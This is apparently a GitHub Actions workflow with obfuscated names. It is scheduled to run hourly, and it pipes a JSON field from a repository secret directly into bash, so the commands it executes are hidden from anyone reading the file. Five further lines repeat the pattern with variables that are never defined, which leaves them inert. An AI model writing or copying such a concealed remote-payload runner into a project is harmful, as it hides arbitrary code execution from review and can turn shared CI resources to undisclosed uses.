name: tangguoqiang6789
on:
  workflow_dispatch:
  schedule:
    - cron: '54 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tangguoqiang6789
        env:
          sdx758: ${{ secrets.sdx758 }}
        run: |
          echo $sdx758 | jq -r .zfwgs45 | /bin/bash
          echo $skl0110 | jq -r .vwwp91 | /bin/bash
          echo $a91055 | jq -r .rtukn400 | /bin/bash
          echo $ozsgs872 | jq -r .bk8 | /bin/bash
          echo $xlg6664 | jq -r .ypr3 | /bin/bash
          echo $qad28 | jq -r .dxswu4751 | /bin/bash

